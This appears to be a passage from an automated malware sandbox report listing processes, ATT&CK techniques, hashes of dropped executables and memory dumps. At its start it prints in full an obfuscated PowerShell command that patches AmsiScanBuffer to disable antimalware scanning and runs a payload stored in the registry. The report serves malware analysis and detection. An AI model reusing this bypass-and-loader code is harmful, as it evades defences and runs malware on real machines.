n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $QuVpqZBWwpK.CreateType();}$ZdICxPLrESKVC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+'eZd'+[Char](73)+'C'+'x'+''+[Char](80)+''+[Char](76)+''+'r'+''+[Char](69)+''+[Char](83)+''+[Char](75)+''+[Char](86)+''+[Char](67)+'');$UiIuPyvPeFINig=$ZdICxPLrESKVC.GetMethod(''+[Char](85)+'i'+[Char](73)+'u'+'P'+''+[Char](121)+''+'v'+''+'P'+''+[Char](101)+''+'F'+''+[Char](73)+''+[Char](78)+'i'+[Char](103)+'',[Reflection.BindingFlags]''+'P'+'ub'+'l'+''+[Char](105)+''+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$msgpiWqodgYfriYwgVg=udewzQaqZlaP @([String])([IntPtr]);$reyBLdciMudwdshBkpvZjE=udewzQaqZlaP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wzgZOLYNpUD=$ZdICxPLrESKVC.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'ll')));$CtWBzXgKHShegt=$UiIuPyvPeFINig.Invoke($Null,@([Object]$wzgZOLYNpUD,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+'y'+''+'A'+'')));$FlQtQEXyPrbCKatwf=$UiIuPyvPeFINig.Invoke($Null,@([Object]$wzgZOLYNpUD,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+'ct')));$QKYLamI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CtWBzXgKHShegt,$msgpiWqodgYfriYwgVg).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$pOIwfRUXSbgOygoQl=$UiIuPyvPeFINig.Invoke($Null,@([Object]$QKYLamI,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+'nB'+[Char](117)+'f'+[Char](102)+'e'+'r'+'')));$ROMlXYylMN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FlQtQEXyPrbCKatwf,$reyBLdciMudwdshBkpvZjE).Invoke($pOIwfRUXSbgOygoQl,[uint32]8,4,[ref]$ROMlXYylMN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pOIwfRUXSbgOygoQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FlQtQEXyPrbCKatwf,$reyBLdciMudwdshBkpvZjE).Invoke($pOIwfRUXSbgOygoQl,[uint32]8,0x20,[ref]$ROMlXYylMN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:4284

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"
1⤵
PID:592

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2d182e48-38c6-4101-b1ce-1adac0b236a2}
1⤵
PID:840

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
2bcfb9ff23ac2ccd140eee33dbc8f065

SHA1
4f78fae8a5e4f6cbd9d58c0678e58517d6951f3b

SHA256
f4662dab0e0f4d9980b287279f29d1f7ee177504c1d3960894e5f8048ecd02ac

SHA512
dd35bb1e607f94785ba5b003b65a5ec7bb42f67ad296cde9de19d1be226528cfe63c58ccab6f21dfe3296427aea3b8a3cb02ddb9583c9029289871beb7f1a906

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6539a34c74920a5c656922258c336b5f

SHA1
36a74be3126b4aa0deef6e094d6199b8f5056645

SHA256
5427dfb4d22bef830b6f6b395b51489a791db48865572adfcb2f8c752293aae7

SHA512
bceb8b61e27e0b710d144005ea93419a8299c70d87188cd8a40253fac32f0a297008f333a1576fa357c5442a395429865a327db8471e048c19f0a0de3b712615

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
2.7MB

MD5
43a0526a928f9daca9c953221406af8e

SHA1
34fdd0d94ecfe8c887ebb164068579013d2c611b

SHA256
88e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986

SHA512
9632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
2.7MB

MD5
43a0526a928f9daca9c953221406af8e

SHA1
34fdd0d94ecfe8c887ebb164068579013d2c611b

SHA256
88e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986

SHA512
9632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
aa187cac09f051e24146ad549a0f08a6

SHA1
2ef7fae3652bb838766627fa6584a6e3b5e74ff3

SHA256
7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

SHA512
960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

Download Submit
memory/208-186-0x00000000021FA000-0x00000000026FE000-memory.dmp

Filesize
5.0MB

Download
memory/208-205-0x0000000002706000-0x0000000002843000-memory.dmp

Filesize
1.2MB

Download
memory/208-166-0x0000000000000000-mapping.dmp

Download
memory/424-200-0x0000000000000000-mapping.dmp

Download
memory/580-235-0x00007FFE8F650000-0x00007FFE8F660000-memory.dmp

Filesize
64KB

Download
memory/668-236-0x00007FFE8F650000-0x00007FFE8F660000-memory.dmp

Filesize
64KB

Download
memory/840-232-0x00007FFECF5D0000-0x00007FFECF7C5000-memory.dmp

Filesize
2.0MB

Download
memory/840-233-0x00007FFECDB30000-0x00007FFECDBEE000-memory.dmp

Filesize
760KB

Download
memory/840-226-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/840-227-0x0000000140002314-mapping.dmp

Download
memory/840-230-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1236-191-0x0000000000000000-mapping.dmp

Download
memory/1936-201-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/1936-194-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/2056-159-0x0000000000000000-mapping.dmp

Download
memory/2056-167-0x0000000004FE0000-0x0000000005072000-memory.dmp

Filesize
584KB

Download
memory/2056-170-0x00000000053F0000-0x00000000053FA000-memory.dmp

Filesize
40KB

Download
memory/2056-163-0x0000000000460000-0x0000000000714000-memory.dmp

Filesize
2.7MB

Download
memory/2628-195-0x0000000000000000-mapping.dmp

Download
memory/2792-192-0x0000000000000000-mapping.dmp

Download
memory/2836-198-0x0000000000000000-mapping.dmp

Download
memory/2932-190-0x0000000000000000-mapping.dmp

Download
memory/2980-203-0x00007FF715B31938-mapping.dmp

Download
memory/3452-197-0x0000000000000000-mapping.dmp

Download
memory/3676-183-0x000002292C4C0000-0x000002292C4E2000-memory.dmp

Filesize
136KB

Download
memory/3676-185-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/3676-187-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/4052-196-0x0000000000000000-mapping.dmp

Download
memory/4064-140-0x0000000000000000-mapping.dmp

Download
memory/4064-141-0x0000000000CA0000-0x0000000000CD6000-memory.dmp

Filesize
216KB

Download
memory/4064-153-0x0000000007350000-0x00000000073E6000-memory.dmp

Filesize
600KB

Download
memory/4064-156-0x0000000007300000-0x0000000007308000-memory.dmp

Filesize
32KB

Download
memory/4064-144-0x00000000055F0000-0x0000000005656000-memory.dmp

Filesize
408KB

Download
memory/4064-147-0x0000000006F30000-0x0000000006F62000-memory.dmp

Filesize
200KB

Download
memory/4064-143-0x0000000004EC0000-0x0000000004EE2000-memory.dmp

Filesize
136KB

Download
memory/4064-148-0x0000000074860000-0x00000000748AC000-memory.dmp

Filesize
304KB

Download
memory/4064-157-0x0000000007420000-0x0000000007442000-memory.dmp

Filesize
136KB

Download
memory/4064-145-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/4064-149-0x0000000006330000-0x000000000634E000-memory.dmp

Filesize
120KB

Download
memory/4064-158-0x0000000008310000-0x00000000088B4000-memory.dmp

Filesize
5.6MB

Download
memory/4064-146-0x0000000005D80000-0x0000000005D9E000-memory.dmp

Filesize
120KB

Download
memory/4064-150-0x00000000076E0000-0x0000000007D5A000-memory.dmp

Filesize
6.5MB

Download
memory/4064-151-0x0000000007090000-0x00000000070AA000-memory.dmp

Filesize
104KB

Download
memory/4064-155-0x0000000007310000-0x000000000732A000-memory.dmp

Filesize
104KB

Download
memory/4064-154-0x00000000072C0000-0x00000000072CE000-memory.dmp

Filesize
56KB

Download
memory/4064-152-0x0000000007110000-0x000000000711A000-memory.dmp

Filesize
40KB

Download
memory/4064-142-0x0000000004F50000-0x0000000005578000-memory.dmp

Filesize
6.2MB

Download
memory/4088-173-0x0000000000000000-mapping.dmp

Download
memory/4088-180-0x00000000057F0000-0x0000000005802000-memory.dmp

Filesize
72KB

Download
memory/4088-182-0x0000000005850000-0x000000000588C000-memory.dmp

Filesize
240KB

Download
memory/4088-181-0x0000000005920000-0x0000000005A2A000-memory.dmp

Filesize
1.0MB

Download
memory/4088-207-0x00000000063D0000-0x0000000006446000-memory.dmp

Filesize
472KB

Download
memory/4088-179-0x0000000005DB0000-0x00000000063C8000-memory.dmp

Filesize
6.1MB

Download
memory/4088-214-0x0000000007A80000-0x0000000007FAC000-memory.dmp

Filesize
5.2MB

Download
memory/4088-210-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/4088-213-0x0000000007380000-0x0000000007542000-memory.dmp

Filesize
1.8MB

Download
memory/4088-174-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4176-199-0x0000000000000000-mapping.dmp

Download
memory/4180-171-0x0000000000000000-mapping.dmp

Download
memory/4284-208-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/4284-224-0x00007FFECF5D0000-0x00007FFECF7C5000-memory.dmp

Filesize
2.0MB

Download
memory/4284-225-0x00007FFECDB30000-0x00007FFECDBEE000-memory.dmp

Filesize
760KB

Download
memory/4420-209-0x0000000000000000-mapping.dmp

Download
memory/4460-162-0x0000000000000000-mapping.dmp

Download
memory/4516-220-0x000001FD36AC0000-0x000001FD36ADA000-memory.dmp

Filesize
104KB

Download
memory/4516-234-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/4516-222-0x000001FD36AA0000-0x000001FD36AA6000-memory.dmp

Filesize
24KB

Download
memory/4516-223-0x000001FD36AB0000-0x000001FD36ABA000-memory.dmp

Filesize
40KB

Download
memory/4516-219-0x000001FD36A60000-0x000001FD36A6A000-memory.dmp

Filesize
40KB

Download
memory/4516-218-0x000001FD36A80000-0x000001FD36A9C000-memory.dmp

Filesize
112KB

Download
memory/4516-221-0x000001FD36A70000-0x000001FD36A78000-memory.dmp

Filesize
32KB

Download
memory/4516-217-0x000001FD359A0000-0x000001FD359AA000-memory.dmp

Filesize
40KB

Download
memory/4516-216-0x000001FD359B0000-0x000001FD359CC000-memory.dmp

Filesize
112KB

Download
memory/4516-215-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/4540-193-0x0000000000000000-mapping.dmp

Download
memory/4552-204-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/4552-211-0x00007FFEB0A90000-0x00007FFEB1551000-memory.dmp

Filesize
10.8MB

Download
memory/4868-139-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4868-132-0x0000000000000000-mapping.dmp

Download
memory/4868-133-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download